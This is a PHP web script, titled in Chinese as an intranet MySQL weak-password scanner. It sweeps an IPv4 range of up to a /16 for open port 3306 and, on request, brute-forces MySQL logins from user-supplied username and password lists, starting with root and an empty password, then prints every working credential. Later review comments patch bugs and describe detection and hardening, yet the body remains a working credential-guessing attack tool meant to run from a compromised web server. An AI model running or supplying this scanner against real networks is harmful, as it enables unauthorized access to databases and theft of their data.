
内网扫mysql弱口令脚本(php)

<?php
// Banner printed on every request. The text credits the poster and states that
// the script is for internal testing only and must not be used illegally.
// NOTE(review): this echo runs before session_start(). Unless output buffering
// is enabled in php.ini, the session cookie header can no longer be sent at that
// point, so the session values used further down would not persist.
echo "from 米的暗部@bbs.isilic.org 仅供内部测试,请勿用于非法用途。";
#Class B PHP port scanner by anthrax @ insight-labs.org
session_start();
// Removes the execution time limit, so one request runs until the whole address
// range has been walked. A long-lived PHP request that opens many outbound
// connections to port 3306 is a useful signal when hunting for this script.
set_time_limit(0);
// Send output to the client as it is produced so progress lines appear during the sweep.
ob_implicit_flush(True);
// Flush and close the active output buffer, if one exists.
ob_end_flush();


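/**
 * Report whether a TCP connection to $ip:$port can be opened within $timeout seconds.
 *
 * The connection is closed again immediately; nothing is sent or read.
 *
 * @param string     $ip      Host to connect to.
 * @param int|string $port    TCP port number.
 * @param float      $timeout Connect timeout in seconds.
 * @return bool true when the connection was established, false otherwise.
 */
function check_port($ip,$port,$timeout=0.1) {
    // '@' hides the warning fsockopen() raises for a refused or timed-out
    // connection; the failure is reported through the return value instead.
    $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($conn === false) {
        // The original fell off the end of the function here and returned null;
        // return an explicit boolean so strict comparisons behave as expected.
        return false;
    }
    fclose($conn);
    return true;
}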
/**
 * Try MySQL logins against $addr:$port and print every combination that connects.
 *
 * Only the 'mysql' type is handled; for any other $type the switch matches
 * nothing and the function does no work. Nothing is returned, results are
 * echoed as HTML lines.
 *
 * Review notes:
 *  - mysql_connect() belongs to the ext/mysql extension, which was removed in
 *    PHP 7.0, so this function only runs on older PHP builds.
 *  - Connections that succeed are never closed in this function.
 *  - $username and $pass are echoed into the page without HTML escaping.
 *  - On the database side this shows up as a burst of failed logins from one
 *    client address across many account names. Alerting on that pattern,
 *    limiting failed logins per account, and not leaving root reachable over
 *    the network with an empty password are the matching defences.
 *
 * @param string $addr     Target host.
 * @param mixed  $port     Target port, appended to the host as "host:port".
 * @param array  $userlist Account names to try.
 * @param array  $passlist Passwords to try for each account name.
 * @param string $type     Service selector; only 'mysql' has a branch.
 */
function crackpwd($addr,$port,$userlist,$passlist,$type){
switch($type){


case 'mysql':


// First attempt: account "root" with an empty password. '@' suppresses the
// warning a rejected login would raise.
if(@mysql_connect($addr.':'.$port, 'root', '')){
echo 'MySQL Username: root EMPTY PASSWORD<br/>';
}
// Then every username/password pair from the two lists, one connection
// attempt per pair, with no delay or stop-on-success.
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mysql_connect($addr.':'.$port, $username, $pass)){
echo 'MySQL Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;


}
}


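/**
 * Probe one host for the ports in the built-in table and print the open ones.
 *
 * When the session flag 'crack' is set and truthy, an open port that maps to a
 * known service type is handed to crackpwd() together with the global
 * $userarr / $passarr lists.
 *
 * @param string $ip      Host to probe.
 * @param mixed  $timeout Connect timeout in seconds; non-numeric or
 *                        non-positive values fall back to 0.1.
 */
function scanip($ip,$timeout){
    // Port => service label. Only MySQL's default port is listed.
    $portarr=array(
        '3306'=>'MySQL Server'
    );

    // Fix: the original call passed `$timeout=0.1`, which overwrote the
    // caller's value on every iteration. The value may arrive straight from
    // a form field, so it is validated here before it reaches fsockopen().
    $timeout = (is_numeric($timeout) && $timeout > 0) ? (float)$timeout : 0.1;

    // Fix: the original test was `isset(...) || ... == true`. That is true for
    // any set value (including false) and reads an undefined index when the
    // key is missing. The password-guessing step must be an explicit opt-in.
    $crackEnabled = !empty($_SESSION['crack']);

    foreach($portarr as $port=>$name){
        if(!check_port($ip,$port,$timeout)){
            continue;
        }
        echo 'Port: '.$port.' '.$name.' is open<br/>';
        @ob_flush();
        @flush();

        if(!$crackEnabled){
            continue;
        }

        // Map the port to the service type crackpwd() understands.
        switch($port){
            case '3306':
                $type='mysql';
                break;
            default:
                $type=false;
        }
        if($type){
            global $userarr,$passarr;
            crackpwd($ip,$port,$userarr,$passarr,$type);
            @ob_flush();
            @flush();
        }
    }
}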


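// Request driver: renders the form, then walks the posted address range and
// calls scanip() for each address.
// NOTE(review): nothing here authenticates the caller or checks a CSRF token,
// so anyone who can reach this URL can make the web server open connections to
// hosts on its own network. A copy of this file found on a server should be
// treated like any other planted web-shell style artefact.

// First visit: seed placeholder texts for the form fields.
if(!isset($_SESSION['startip'])){
    $_SESSION['startip']='Start IP';
    $_SESSION['endip']='End IP';
    $_SESSION['username']='···';
    $_SESSION['password']='····';
}

// Fix: the session values originate from earlier POST data and were written
// into the markup unescaped, which allowed HTML/script injection through the
// form fields. They are escaped for the HTML context before output.
$formStart=htmlspecialchars((string)$_SESSION['startip'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$formEnd=htmlspecialchars((string)$_SESSION['endip'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$formUsers=htmlspecialchars((string)$_SESSION['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$formPass=htmlspecialchars((string)$_SESSION['password'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

echo '<html>
<form action="" method="post">
<input type="text" name="startip" value="'.$formStart.'" />
<input type="text" name="endip" value="'.$formEnd.'" />
Timeout<input type="text" name="timeout" value="0.1" /><br/>
Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP
<input type="checkbox" name="crack" value="Crack password"><br/>
<textarea rows="10" cols="30" name="username">'.$formUsers.'
</textarea>
<textarea rows="10" cols="30" name="password">'.$formPass.'
</textarea><br/>
<button type="submit" name="submit">Scan</button>
</form>
</html>
';
if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){
    if(isset($_POST['crack'])){
        global $userarr,$passarr;
        $_SESSION['crack']=true;
        // Accept only plain string fields; an array-valued field becomes an empty list.
        $rawUsers=(isset($_POST['username'])&&is_string($_POST['username'])) ? $_POST['username'] : '';
        $rawPass=(isset($_POST['password'])&&is_string($_POST['password'])) ? $_POST['password'] : '';
        // One entry per line, duplicates dropped.
        $userarr=array_unique(explode("\n",str_replace("\r", "", $rawUsers)));
        $passarr=array_unique(explode("\n",str_replace("\r", "", $rawPass)));
        $_SESSION['username']=$rawUsers;
        $_SESSION['password']=$rawPass;
    }else{
        // Fix: the flag used to stay in the session forever once set, so later
        // requests with the box unchecked still ran the password-guessing step.
        unset($_SESSION['crack']);
    }
    $startip=$_POST['startip'];
    $endip=$_POST['endip'];
    $timeout=is_numeric($_POST['timeout']) ? (float)$_POST['timeout'] : 0.1;

    // Fix: both addresses must be well-formed dotted-quad IPv4 before they are
    // split, stored in the session, or echoed back. The original only counted
    // the dot-separated parts of the start address.
    if(filter_var($startip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)===false
        ||filter_var($endip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)===false){
        exit('IP error: Wrong IP address or Trying to scan class A address');
    }
    $siparr=array_map('intval',explode('.',$startip));
    $eiparr=array_map('intval',explode('.',$endip));
    $ciparr=$siparr;
    // Both ends must share the first two octets, which caps a run at one /16.
    if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
        exit('IP error: Wrong IP address or Trying to scan class A address');
    }
    // Fix: with no execution time limit, an end address below the start
    // address made the loop below run without ever terminating.
    if($siparr[2]*256+$siparr[3]>$eiparr[2]*256+$eiparr[3]){
        exit('IP error: Wrong IP address or Trying to scan class A address');
    }
    $_SESSION['startip']=$startip;
    $_SESSION['endip']=$endip;
    if($startip==$endip){
        echo 'Scanning IP '.$startip.'<br/>';
        @ob_flush();
        @flush();
        scanip($startip,$timeout);
        @ob_flush();
        @flush();
        exit();
    }

    // Move the stop value one past the end address so the end is included.
    // When the end address finishes in .255 it is left as is, so that last
    // address acts as the stop value and is not itself probed.
    if($eiparr[3]!=255){
        $eiparr[3]+=1;
    }
    while($ciparr!=$eiparr){
        $ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
        echo '<br/>Scanning IP '.$ip.'<br/>';
        @ob_flush();
        @flush();
        scanip($ip,$timeout);
        $ciparr[3]+=1;

        // Carry from the fourth octet into the third, and from the third into the second.
        if($ciparr[3]>255){
            $ciparr[2]+=1;
            $ciparr[3]=0;
        }
        if($ciparr[2]>255){
            $ciparr[1]+=1;
            $ciparr[2]=0;
        }
    }
}else{
    exit('Missing input');
}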
?>